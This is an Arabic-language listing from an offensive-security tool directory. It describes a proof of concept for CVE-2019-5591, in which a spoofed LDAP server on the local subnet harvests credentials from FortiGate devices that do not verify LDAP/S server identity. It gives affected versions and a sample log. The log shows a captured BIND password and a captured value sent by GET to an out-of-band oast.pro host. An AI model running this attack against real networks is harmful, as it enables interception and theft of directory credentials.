Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
fortios-ldap-mitm-poc-CVE-2019-5591 — التكوين الافتراضي لـ LDAP على FortiOS v6.0.x إلى v6.2.0 لا يتحقق من هوية الخادم لـ LDAP/S مما يؤدي إلى هجمات MITM. هذا الإثبات العملي يوضح استخراج كامل لبيانات الاعتماد المرسلة على الشبكة الفرعية المحلية إلى خادم LDAP يسهل انتحاله. | Kitploit
أدوات/GitHubGitHub/ayewo/fortios-ldap-mitm-poc-cve-2019-5591
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكاتاختبار الاختراقالمصادقة
GitHubayewo/fortios-ldap-mitm-poc-cve-2019-5591

fortios-ldap-mitm-poc-CVE-2019-5591

التكوين الافتراضي لـ LDAP على FortiOS v6.0.x إلى v6.2.0 لا يتحقق من هوية الخادم لـ LDAP/S مما يؤدي إلى هجمات MITM. هذا الإثبات العملي يوضح استخراج كامل لبيانات الاعتماد المرسلة على الشبكة الفرعية المحلية إلى خادم LDAP يسهل انتحاله.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

CVE-2019-5591

هذا الإثبات العملي (PoC) يُظهر هجوم MITM (رجل في المنتصف): انتحال خادم LDAP على الشبكة الفرعية المحلية لجهاز FortiGate الذي يعمل بإصدار ضعيف من FortiOS.

الإصدارات المتأثرة

هذه الإصدارات معرضة للخطر:

الإصدارمتأثرالحل
FortiOS 7.0غير متأثرغير قابل للتطبيق
FortiOS 6.06.0.3 حتى 6.2.0الترقية إلى 6.2.1 أو أعلى

الاكتشاف أثناء العمل

تم استخدام FortiOS 6.2.0 الذي يعمل داخل VMware Fusion في الإثبات العملي.

root@kitploit:~

[2025-10-16 22:59:47.366765] New connection from 192.168.43.24:54789

--- Request #1 ---
BIND Request:
  Message ID: 1
  DN: cn=admin,dc=example,dc=com
  Password: ldapAdMiNPassw0rd!
  -> Sent BIND Response (Success)

--- Request #2 ---
SEARCH Request:
  Message ID: 2
  Base DN: dc=example,dc=com
  Filter: 

cn
nLBkcjDTHC01.1...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #3 ---
BIND Request:
  Message ID: 3
  DN: dc=example,dc=com
  Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro

🔑 CAPTURED PASSWORD: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
🔧 No scheme found — prepending https:// -> https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
📡 Attempting GET request to: https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
✅ GET request successful! Status code: 200
  -> Sent BIND Response (Success)

--- Request #4 ---
SEARCH Request:
  Message ID: 4
  Base DN: dc=example,dc=com
  Filter: 


objectclass0memberOfprimaryG...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #5 ---

[2025-10-16 22:59:49.159193] Connection closed from 192.168.43.24:54789

============================================================
SESSION SUMMARY - Captured Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
============================================================

الوصف

التكوين الافتراضي لـ LDAP على FortiOS v6.0.x حتى v6.2.0 لا يتحقق من هوية الخادم لـ LDAP/S مما يؤدي إلى هجمات MITM. يوضح هذا الإثبات العملي تسريبًا كاملاً لبيانات الاعتماد المرسلة على الشبكة الفرعية المحلية إلى خادم LDAP يسهل انتحاله.

تنزيل الأداة